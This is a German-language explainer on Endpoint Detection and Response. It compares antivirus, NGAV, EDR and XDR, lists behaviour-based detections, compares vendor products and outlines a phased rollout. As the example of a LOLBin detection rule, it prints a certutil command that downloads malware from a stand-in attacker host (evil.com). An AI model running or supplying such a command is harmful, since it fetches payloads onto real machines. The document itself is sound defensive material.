Endpoint Detection and Response (EDR) - Verhaltensbasierter Endpunktschutz

EDR löst das Kernproblem des traditionellen Antivirus: Signaturen erkennen nur bekannte Bedrohungen. Moderne Angreifer umgehen Signaturen trivial - durch Obfuskation, Polymorphismus oder dateilose Angriffe. EDR beobachtet WAS ein Prozess tut, nicht WIE er aussieht.

EDR vs. Antivirus vs. XDR

Generation 1: Antivirus (AV)

• Methode: Signatur-Vergleich (Hash/Pattern)
• Erkennt: bekannte Malware
• Blind für: neue Malware, Obfuskation, dateilose Angriffe
• Reaktion: Datei löschen/quarantänisieren

Bypass-Trivialität: Ein einziges geändertes Byte ergibt einen neuen Hash ohne Match. Base64-Encoding eines PowerShell-Scripts erzeugt ebenfalls keinen Match. Living-off-the-land (certutil, mshta) löst keinen Antivirus-Trigger aus.

Generation 2: NGAV (Next-Gen AV)

• Methode: ML + statische Analyse + Signaturen
• Erkennt: bekannte + unbekannte Malware-Familien
• Blind für: Verhaltens-Anomalien, Memory-only-Angriffe

Generation 3: EDR

• Methode: Verhaltens-Monitoring aller Prozesse
• Erkennt: dateilose Angriffe, Injection, LOLBins, Memory-Manipulation
• Sieht: Prozess-Baumdiagramm (wer hat wen gespawnt?)
• Reaktion: Isolation, Kill, Forensik-Snapshot

Generation 4: XDR (Extended Detection and Response)

• Methode: Korrelation über Endpoint + Netzwerk + Cloud + Identity
• Erkennt: komplexe Multi-Stage-Angriffe
• Beispiel: Endpoint-Alert + Cloud-Login-Anomalie = ein Incident
• Produkte: Microsoft Defender XDR, Palo Alto Cortex XDR

EDR-Kernfähigkeiten

Fähigkeit	Beschreibung
Telemetrie	Alle Prozesse, Netzwerkverbindungen, Registry-Änderungen
Detection	Verhaltens-Regeln + ML + Threat-Intel-IOCs
Investigation	Angriffsbaum visualisieren (Parent→Child-Prozesse)
Response	Isolation, Prozess-Kill, Remote-Forensik
Hunting	Proaktive Suche nach Kompromittierungs-Indikatoren

EDR-Kerndetektionen

Process Injection

• Code in fremden Prozess injizieren (z. B. svchost.exe)
• Techniken: CreateRemoteThread, Process Hollowing, DLL Injection
• EDR erkennt anomale Speicher-Schreibvorgänge in fremde Prozesse
• Event: suspicious memory allocation + execution in svchost.exe

LOLBin (Living-off-the-Land)

Missbrauch legitimer Windows-Tools wie mshta.exe, regsvr32.exe, certutil.exe, rundll32.exe.

Beispiel-Regel: Alert, wenn certutil.exe mit URL-Parameter aufgerufen wird (Download-Indikator):

certutil.exe -urlcache -split -f http://evil.com/malware.exe

Legitimer Einsatz ist selten - Alarm wird sofort ausgelöst.

Dateilose Malware (Fileless)

• Nur im RAM - keine Datei auf Disk
• PowerShell: encoded command + AMSI-Bypass
• Reflective DLL Loading: DLL direkt in Speicher laden
• EDR sieht PowerShell-Prozess mit Base64-Inhalt → Alert

AMSI-Bypass-Erkennung

• Angreifer patchen AMSI (AntiMalware Scan Interface) im RAM
• EDR erkennt Memory-Write auf AMSI.dll-Region → sofortiger Alert

Signed Binary Missbrauch (DLL Hijacking)

• Signiertes Binary mit bösartiger Side-DLL
• EDR erkennt DLL aus unerwarteter Lokation → Alert

Persistence-Erkennung

EDR erkennt und alarmiert bei allen gängigen Persistence-Techniken:

• Registry Run-Key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
• Scheduled Task erstellt
• WMI-Event-Subscription
• Startup-Ordner

EDR-Produkte im Vergleich

Microsoft Defender for Endpoint (MDE)

Stärken:

• Native Windows-Integration (tief im OS)
• M365/Entra-Integration: Identität + Endpoint
• Attack Surface Reduction (ASR) Rules
• Defender Antivirus integriert
• Microsoft Sentinel: nahtlose SIEM-Integration
• Kostengünstig für Microsoft-Shops (im E5-Bundle)

Schwächen:

• Mac/Linux: weniger ausgereift als Windows
• Geringere Telemetrie-Granularität als CrowdStrike

Kosten: Defender for Business ca. 3 EUR/User/Monat (KMU); E5-Bundle ca. 52 EUR/User/Monat (alles inklusive)

CrowdStrike Falcon

Stärken:

• Marktführer in der EDR-Branche (Gartner Magic Quadrant)
• OverWatch: 24/7 Threat Hunting durch CrowdStrike-Team
• Beste Cross-Platform-Abdeckung (Windows/Mac/Linux)
• Threat Graph: globale Threat Intelligence aus Millionen Sensoren

Schwächen:

• Sehr teuer
• Bekannt: Im Juli 2024 verursachte ein Sensor-Update einen weltweiten BSOD-Ausfall

Lehre daraus: Update-Testing vor globalem Rollout ist Pflicht.

SentinelOne Singularity

Stärken:

• Vollautomatische Remediation (kein Analyst nötig)
• Storyline: Attack-Graph wird automatisch erstellt
• Autonomer Response: isoliert, killt, rollback ohne menschliche Eingriff
• Singularity XDR: SIEM + EDR integriert

Besonders geeignet für Unternehmen, die Automatisierung priorisieren.

Palo Alto Cortex XDR

• Starke Netzwerk-Integration (Prisma + XDR)
• Gut geeignet, wenn NGFW bereits von Palo Alto
• Sehr umfangreich, aufwendig zu betreiben

EDR-Implementierung: Rollout-Strategie

Phase 1: Pilotgruppe (Woche 1-4)

• 50-100 Rechner (IT-Abteilung, nicht kritische Systeme)
• Monitoring-Modus: nur Alert, kein Block
• Tuning: False Positives identifizieren und ausschließen
• Baseline: normale Aktivitäten erlernen

Phase 2: Erweiterte Pilotgruppe (Woche 5-8)

• 500 Rechner (diverse Abteilungen)
• Erste Block-Rules aktivieren (nur Highconfidence-Detektionen)
• Help-Desk einbinden: Mitarbeiter melden EDR-Blockierungen
• Eskalationspfad: SOC-Analyst → IT-Admin → Help-Desk

Phase 3: Vollrollout (Monat 3-6)

• Alle Endgeräte + Server
• Advanced Rules aktivieren (nach Baseline-Learning)
• Automated Response: kritische Threats werden sofort isoliert

Falsch-Positiv-Management

Die ersten 4 Wochen: nur Alert, kein Block. Danach schrittweise Block für hohe Konfidenz-Regeln einschalten. IT kennt legitime Ausnahmen (Monitoring-Tools).

Häufige False Positives:

• Backup-Software: liest viele Dateien → kann Ransomware-Erkennung auslösen
• Entwicklertools: Code-Injection beim Debugging → EDR-Alert möglich
• Automatische Tests: Exploit-Code in Testumgebungen

EDR-Telemetrie für SIEM

• EDR liefert hochwertige Events an das SIEM (CEF/Syslog)
• Korrelation: EDR-Alert + SIEM-Kontext = bessere Triage
• Beispiel: EDR-Alert „Kerberoasting” + AD-Event 4769 = gemeinsamer Incident